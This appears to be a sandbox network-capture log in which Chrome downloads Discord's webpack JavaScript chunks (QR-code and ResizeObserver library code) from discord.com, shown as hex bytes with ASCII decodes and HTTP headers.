                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 38 32 39 31 22 5d 2c 7b 39 34 38 37 37 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 28 22 37 30 31 30 32 22 29 3b 76 61 72 20 6f 3d 72 28 22 37 36 34 37 38 39 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 7d 69 2e 72 65 73 65 74 57 61 72 6e 69 6e 67 43 61 63 68 65 3d 6e 2c 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 2c 72 2c 6e 2c 69 2c 61 29 7b 69 66 28 61 21 3d 3d 6f 29 7b 76 61 72 20
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["68291"],{948773:function(t,e,r){"use strict";r("70102");var o=r("764789");function n(){}function i(){}i.resetWarningCache=n,t.exports=function(){function t(t,e,r,n,i,a){if(a!==o){var
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 3e 65 2d 72 2d 31 26 31 29 3d 3d 31 29 7d 2c 67 65 74 4c 65 6e 67 74 68 49 6e 42 69 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 65 6e 67 74 68 7d 2c 70 75 74 42 69 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 6c 65 6e 67 74 68 2f 38 29 3b 74 68 69 73 2e 62 75 66 66 65 72 2e 6c 65 6e 67 74 68 3c 3d 65 26 26 74 68 69 73 2e 62 75 66 66 65 72 2e 70 75 73 68 28 30 29 2c 74 26 26 28 74 68 69 73 2e 62 75 66 66 65 72 5b 65 5d 7c 3d 31 32 38 3e 3e 3e 74 68 69 73 2e 6c 65 6e 67 74 68 25 38 29 2c 74 68 69 73 2e 6c 65 6e 67 74 68 2b 2b 7d 7d 2c 74 2e 65 78 70 6f 72 74 73 3d 6f 7d 2c 31 32 37 32 36 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 74 2e 65 78 70 6f
                                                                          Data Ascii: >e-r-1&1)==1)},getLengthInBits:function(){return this.length},putBit:function(t){var e=Math.floor(this.length/8);this.buffer.length<=e&&this.buffer.push(0),t&&(this.buffer[e]|=128>>>this.length%8),this.length++}},t.exports=o},127266:function(t,e,r){t.expo
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 61 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6e 65 77 20 6f 28 74 29 3b 74 68 69 73 2e 64 61 74 61 4c 69 73 74 2e 70 75 73 68 28 65 29 2c 74 68 69 73 2e 64 61 74 61 43 61 63 68 65 3d 6e 75 6c 6c 7d 2c 6c 2e 69 73 44 61 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 74 3c 30 7c 7c 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3c 3d 74 7c 7c 65 3c 30 7c 7c 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3c 3d 65 29 74 68 72 6f 77 20 45 72 72 6f 72 28 74 2b 22 2c 22 2b 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 74 5d 5b 65 5d 7d 2c 6c 2e 67 65 74 4d 6f 64 75 6c 65 43 6f 75 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 7d 2c 6c 2e 6d 61 6b
                                                                          Data Ascii: a=function(t){var e=new o(t);this.dataList.push(e),this.dataCache=null},l.isDark=function(t,e){if(t<0||this.moduleCount<=t||e<0||this.moduleCount<=e)throw Error(t+","+e);return this.modules[t][e]},l.getModuleCount=function(){return this.moduleCount},l.mak
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 31 29 26 26 21 28 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3c 3d 74 2b 72 29 29 66 6f 72 28 76 61 72 20 6f 3d 2d 31 3b 6f 3c 3d 37 3b 6f 2b 2b 29 21 28 65 2b 6f 3c 3d 2d 31 29 26 26 21 28 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 3c 3d 65 2b 6f 29 26 26 28 30 3c 3d 72 26 26 72 3c 3d 36 26 26 28 30 3d 3d 6f 7c 7c 36 3d 3d 6f 29 7c 7c 30 3c 3d 6f 26 26 6f 3c 3d 36 26 26 28 30 3d 3d 72 7c 7c 36 3d 3d 72 29 7c 7c 32 3c 3d 72 26 26 72 3c 3d 34 26 26 32 3c 3d 6f 26 26 6f 3c 3d 34 3f 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 74 2b 72 5d 5b 65 2b 6f 5d 3d 21 30 3a 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 74 2b 72 5d 5b 65 2b 6f 5d 3d 21 31 29 7d 2c 6c 2e 67 65 74 42 65 73 74 4d 61 73 6b 50 61 74 74 65 72 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28
                                                                          Data Ascii: 1)&&!(this.moduleCount<=t+r))for(var o=-1;o<=7;o++)!(e+o<=-1)&&!(this.moduleCount<=e+o)&&(0<=r&&r<=6&&(0==o||6==o)||0<=o&&o<=6&&(0==r||6==r)||2<=r&&r<=4&&2<=o&&o<=4?this.modules[t+r][e+o]=!0:this.modules[t+r][e+o]=!1)},l.getBestMaskPattern=function(){for(
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 28 76 61 72 20 72 3d 30 3b 72 3c 31 38 3b 72 2b 2b 29 7b 76 61 72 20 6f 3d 21 74 26 26 28 65 3e 3e 72 26 31 29 3d 3d 31 3b 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 72 25 33 2b 74 68 69 73 2e 6d 6f 64 75 6c 65 43 6f 75 6e 74 2d 38 2d 33 5d 5b 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 33 29 5d 3d 6f 7d 7d 2c 6c 2e 73 65 74 75 70 54 79 70 65 49 6e 66 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 68 69 73 2e 65 72 72 6f 72 43 6f 72 72 65 63 74 4c 65 76 65 6c 3c 3c 33 7c 65 2c 6f 3d 61 2e 67 65 74 42 43 48 54 79 70 65 49 6e 66 6f 28 72 29 2c 6e 3d 30 3b 6e 3c 31 35 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 21 74 26 26 28 6f 3e 3e 6e 26 31 29 3d 3d 31 3b 6e 3c 36 3f 74 68 69 73 2e 6d 6f 64 75 6c 65 73 5b 6e 5d 5b 38 5d 3d 69 3a 6e 3c 38
                                                                          Data Ascii: (var r=0;r<18;r++){var o=!t&&(e>>r&1)==1;this.modules[r%3+this.moduleCount-8-3][Math.floor(r/3)]=o}},l.setupTypeInfo=function(t,e){for(var r=this.errorCorrectLevel<<3|e,o=a.getBCHTypeInfo(r),n=0;n<15;n++){var i=!t&&(o>>n&1)==1;n<6?this.modules[n][8]=i:n<8
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 65 61 74 65 42 79 74 65 73 28 75 2c 6f 29 7d 2c 73 2e 63 72 65 61 74 65 42 79 74 65 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 2c 6f 3d 30 2c 6e 3d 30 2c 69 3d 41 72 72 61 79 28 65 2e 6c 65 6e 67 74 68 29 2c 73 3d 41 72 72 61 79 28 65 2e 6c 65 6e 67 74 68 29 2c 6c 3d 30 3b 6c 3c 65 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 7b 76 61 72 20 66 3d 65 5b 6c 5d 2e 64 61 74 61 43 6f 75 6e 74 2c 68 3d 65 5b 6c 5d 2e 74 6f 74 61 6c 43 6f 75 6e 74 2d 66 3b 6f 3d 4d 61 74 68 2e 6d 61 78 28 6f 2c 66 29 2c 6e 3d 4d 61 74 68 2e 6d 61 78 28 6e 2c 68 29 2c 69 5b 6c 5d 3d 41 72 72 61 79 28 66 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 69 5b 6c 5d 2e 6c 65 6e 67 74 68 3b 67 2b 2b 29 69 5b 6c 5d 5b 67 5d 3d 32 35 35 26 74 2e 62 75 66 66
                                                                          Data Ascii: eateBytes(u,o)},s.createBytes=function(t,e){for(var r=0,o=0,n=0,i=Array(e.length),s=Array(e.length),l=0;l<e.length;l++){var f=e[l].dataCount,h=e[l].totalCount-f;o=Math.max(o,f),n=Math.max(n,h),i[l]=Array(f);for(var g=0;g<i[l].length;g++)i[l][g]=255&t.buff
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 38 30 2c 35 30 2c 34 2c 38 31 2c 35 31 5d 2c 5b 34 2c 35 30 2c 32 32 2c 34 2c 35 31 2c 32 33 5d 2c 5b 33 2c 33 36 2c 31 32 2c 38 2c 33 37 2c 31 33 5d 2c 5b 32 2c 31 31 36 2c 39 32 2c 32 2c 31 31 37 2c 39 33 5d 2c 5b 36 2c 35 38 2c 33 36 2c 32 2c 35 39 2c 33 37 5d 2c 5b 34 2c 34 36 2c 32 30 2c 36 2c 34 37 2c 32 31 5d 2c 5b 37 2c 34 32 2c 31 34 2c 34 2c 34 33 2c 31 35 5d 2c 5b 34 2c 31 33 33 2c 31 30 37 5d 2c 5b 38 2c 35 39 2c 33 37 2c 31 2c 36 30 2c 33 38 5d 2c 5b 38 2c 34 34 2c 32 30 2c 34 2c 34 35 2c 32 31 5d 2c 5b 31 32 2c 33 33 2c 31 31 2c 34 2c 33 34 2c 31 32 5d 2c 5b 33 2c 31 34 35 2c 31 31 35 2c 31 2c 31 34 36 2c 31 31 36 5d 2c 5b 34 2c 36 34 2c 34 30 2c 35 2c 36 35 2c 34 31 5d 2c 5b 31 31 2c 33 36 2c 31 36 2c 35 2c 33 37 2c 31 37 5d 2c 5b 31 31 2c
                                                                          Data Ascii: 80,50,4,81,51],[4,50,22,4,51,23],[3,36,12,8,37,13],[2,116,92,2,117,93],[6,58,36,2,59,37],[4,46,20,6,47,21],[7,42,14,4,43,15],[4,133,107],[8,59,37,1,60,38],[8,44,20,4,45,21],[12,33,11,4,34,12],[3,145,115,1,146,116],[4,64,40,5,65,41],[11,36,16,5,37,17],[11,
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 31 2c 37 33 2c 34 35 2c 37 2c 37 34 2c 34 36 5d 2c 5b 31 2c 35 33 2c 32 33 2c 33 37 2c 35 34 2c 32 34 5d 2c 5b 31 39 2c 34 35 2c 31 35 2c 32 36 2c 34 36 2c 31 36 5d 2c 5b 35 2c 31 34 35 2c 31 31 35 2c 31 30 2c 31 34 36 2c 31 31 36 5d 2c 5b 31 39 2c 37 35 2c 34 37 2c 31 30 2c 37 36 2c 34 38 5d 2c 5b 31 35 2c 35 34 2c 32 34 2c 32 35 2c 35 35 2c 32 35 5d 2c 5b 32 33 2c 34 35 2c 31 35 2c 32 35 2c 34 36 2c 31 36 5d 2c 5b 31 33 2c 31 34 35 2c 31 31 35 2c 33 2c 31 34 36 2c 31 31 36 5d 2c 5b 32 2c 37 34 2c 34 36 2c 32 39 2c 37 35 2c 34 37 5d 2c 5b 34 32 2c 35 34 2c 32 34 2c 31 2c 35 35 2c 32 35 5d 2c 5b 32 33 2c 34 35 2c 31 35 2c 32 38 2c 34 36 2c 31 36 5d 2c 5b 31 37 2c 31 34 35 2c 31 31 35 5d 2c 5b 31 30 2c 37 34 2c 34 36 2c 32 33 2c 37 35 2c 34 37 5d 2c 5b 31
                                                                          Data Ascii: 1,73,45,7,74,46],[1,53,23,37,54,24],[19,45,15,26,46,16],[5,145,115,10,146,116],[19,75,47,10,76,48],[15,54,24,25,55,25],[23,45,15,25,46,16],[13,145,115,3,146,116],[2,74,46,29,75,47],[42,54,24,1,55,25],[23,45,15,28,46,16],[17,145,115],[10,74,46,23,75,47],[1
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 54 41 42 4c 45 5b 28 74 2d 31 29 2a 34 2b 32 5d 3b 63 61 73 65 20 6f 2e 48 3a 72 65 74 75 72 6e 20 6e 2e 52 53 5f 42 4c 4f 43 4b 5f 54 41 42 4c 45 5b 28 74 2d 31 29 2a 34 2b 33 5d 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 7d 7d 2c 74 2e 65 78 70 6f 72 74 73 3d 6e 7d 2c 31 32 32 32 31 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 72 28 22 37 30 31 30 32 22 29 3b 66 6f 72 28 76 61 72 20 6f 3d 7b 67 6c 6f 67 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 3c 31 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 67 6c 6f 67 28 22 2b 74 2b 22 29 22 29 3b 72 65 74 75 72 6e 20 6f 2e 4c 4f 47 5f 54 41 42 4c 45 5b 74 5d 7d 2c 67 65 78 70 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 74 3c 30 3b 29 74 2b 3d 32 35 35 3b 66 6f 72 28 3b 74 3e 3d 32 35 36
                                                                          Data Ascii: TABLE[(t-1)*4+2];case o.H:return n.RS_BLOCK_TABLE[(t-1)*4+3];default:return}},t.exports=n},122212:function(t,e,r){r("70102");for(var o={glog:function(t){if(t<1)throw Error("glog("+t+")");return o.LOG_TABLE[t]},gexp:function(t){for(;t<0;)t+=255;for(;t>=256


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          339192.168.2.550075162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:22 UTC866OUTGET /assets/40413.ee00763112ee8df65f08.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MuKRNnb87L1y398_4RmJyNjCxq2KEUPnsExQwAzBUyg-1702226721658-0-604800000
                                                                          2023-12-10 16:45:22 UTC964INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 39 30 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 35 66 65 35 35 62 33 64 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:22 GMTContent-Type: application/javascriptContent-Length: 7907Connection: closeCF-Ray: 8336f535fe55b3d1-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:22 UTC405INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 30 34 31 33 22 5d 2c 7b 32 33 30 36 30 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 7d 29 2c 6e 28 22 32 32 32 30 30 37 22 29 2c 6e 28 22 34 32 34 39 37 33 22 29 2c 6e 28 22 38 35 34 35 30 38 22 29 2c 6e 28 22 38 30 38 36 35 33 22 29 2c 6e 28 22 37 30 31 30 32 22 29 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["40413"],{230606:function(t,e,n){"use strict";n.r(e),n.d(e,{default:function(){return g}}),n("222007"),n("424973"),n("854508"),n("808653"),n("70102");var r=function(){if("undefined"!=t
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 5f 3d 5b 5d 7d 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 22 73 69 7a 65 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 5f 65 6e 74 72 69 65 73 5f 5f 2e 6c 65 6e 67 74 68 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 28 74 68 69 73 2e 5f 5f 65 6e 74 72 69 65 73 5f 5f 2c 65 29 2c 72 3d 74 68 69 73 2e 5f 5f 65 6e 74 72 69 65 73 5f 5f 5b 6e 5d 3b 72 65 74 75 72 6e 20 72 26 26 72 5b 31 5d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e
                                                                          Data Ascii: _=[]}return Object.defineProperty(e.prototype,"size",{get:function(){return this.__entries__.length},enumerable:!0,configurable:!0}),e.prototype.get=function(e){var n=t(this.__entries__,e),r=this.__entries__[n];return r&&r[1]},e.prototype.set=function(e,n
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 72 65 66 72 65 73 68 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 21 31 2c 72 3d 21 31 2c 69 3d 30 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 6e 26 26 28 6e 3d 21 31 2c 74 28 29 29 2c 72 26 26 61 28 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 73 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 76 61 72 20 74 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 69 66 28 6e 29 7b 69 66 28 74 2d 69 3c 32 29 72 65 74 75 72 6e 3b 72 3d 21 30 7d 65 6c 73 65 20 6e 3d 21 30 2c 72 3d 21 31 2c 73 65 74 54 69 6d 65 6f 75 74 28 63 2c 32 30 29 3b 69 3d 74 7d 72 65 74 75 72 6e 20 61 7d 28 74 68 69 73 2e 72 65 66 72 65 73 68 2e 62 69 6e 64 28 74 68 69 73 29 2c 32 30 29 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 4f 62 73 65 72 76 65 72 3d 66
                                                                          Data Ascii: refresh=function(t,e){var n=!1,r=!1,i=0;function o(){n&&(n=!1,t()),r&&a()}function c(){s(o)}function a(){var t=Date.now();if(n){if(t-i<2)return;r=!0}else n=!0,r=!1,setTimeout(c,20);i=t}return a}(this.refresh.bind(this),20)}return t.prototype.addObserver=f
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 72 65 73 68 29 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 4f 62 73 65 72 76 65 72 5f 26 26 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 4f 62 73 65 72 76 65 72 5f 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 45 76 65 6e 74 73 41 64 64 65 64 5f 26 26 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 53 75 62 74 72 65 65 4d 6f 64 69 66 69 65 64 22 2c 74 68 69 73 2e 72 65 66 72 65 73 68 29 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 4f 62 73 65 72 76 65 72 5f 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 45 76 65 6e 74 73 41 64 64 65 64 5f 3d 21 31 2c 74 68 69 73 2e 63 6f 6e 6e 65 63 74 65 64 5f 3d 21 31 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 54 72 61
                                                                          Data Ascii: resh),this.mutationsObserver_&&this.mutationsObserver_.disconnect(),this.mutationEventsAdded_&&document.removeEventListener("DOMSubtreeModified",this.refresh),this.mutationsObserver_=null,this.mutationEventsAdded_=!1,this.connected_=!1)},t.prototype.onTra
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 2c 30 2c 28 65 3d 74 2e 67 65 74 42 42 6f 78 28 29 29 2e 77 69 64 74 68 2c 65 2e 68 65 69 67 68 74 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 6e 3d 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 3b 69 66 28 21 65 26 26 21 6e 29 72 65 74 75 72 6e 20 64 3b 76 61 72 20 72 3d 66 28 74 29 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 7b 7d 2c 6e 3d 30 2c 72 3d 5b 22 74 6f 70 22 2c 22 72 69 67 68 74 22 2c 22 62 6f 74 74 6f 6d 22 2c 22 6c 65 66 74 22 5d 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 72 5b 6e 5d 2c 6f 3d 74 5b 22 70 61 64 64 69 6e 67 2d 22 2b 69 5d 3b 65 5b 69 5d
                                                                          Data Ascii: ,0,(e=t.getBBox()).width,e.height)}return function(t){var e=t.clientWidth,n=t.clientHeight;if(!e&&!n)return d;var r=f(t).getComputedStyle(t),i=function(t){for(var e={},n=0,r=["top","right","bottom","left"];n<r.length;n++){var i=r[n],o=t["padding-"+i];e[i]
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 63 6f 6e 74 72 6f 6c 6c 65 72 5f 3d 65 2c 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 43 74 78 5f 3d 6e 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 62 73 65 72 76 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 31 20 61 72 67 75 6d 65 6e 74 20 72 65 71 75 69 72 65 64 2c 20 62 75 74 20 6f 6e 6c 79 20 30 20 70 72 65 73 65 6e 74 2e 22 29 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 45 6c 65 6d 65 6e 74 26 26 45 6c 65 6d 65 6e 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 4f 62 6a 65 63 74 29 7b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 66 28 74 29 2e 45 6c 65 6d 65 6e 74 29 29 74 68 72 6f 77 20 54 79 70 65
                                                                          Data Ascii: controller_=e,this.callbackCtx_=n}return t.prototype.observe=function(t){if(!arguments.length)throw TypeError("1 argument required, but only 0 present.");if("undefined"!=typeof Element&&Element instanceof Object){if(!(t instanceof f(t).Element))throw Type
                                                                          2023-12-10 16:45:22 UTC657INData Raw: 79 70 65 2e 68 61 73 41 63 74 69 76 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 63 74 69 76 65 4f 62 73 65 72 76 61 74 69 6f 6e 73 5f 2e 6c 65 6e 67 74 68 3e 30 7d 2c 74 7d 28 29 2c 79 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 65 61 6b 4d 61 70 3f 6e 65 77 20 57 65 61 6b 4d 61 70 3a 6e 65 77 20 72 2c 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 3d 66 75 6e 63 74 69 6f 6e 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 28 74 29 7b 69 66 28 21 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 2e 22 29 3b 69 66
                                                                          Data Ascii: ype.hasActive=function(){return this.activeObservations_.length>0},t}(),y="undefined"!=typeof WeakMap?new WeakMap:new r,ResizeObserver=function ResizeObserver(t){if(!(this instanceof ResizeObserver))throw TypeError("Cannot call a class as a function.");if


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          340192.168.2.550076162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:22 UTC866OUTGET /assets/78995.107fd966757822e36874.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=AvNavXW7DDCNgmSvKuaF7ETFbJLYZ1_4UsbUhLNw5Xo-1702226721674-0-604800000
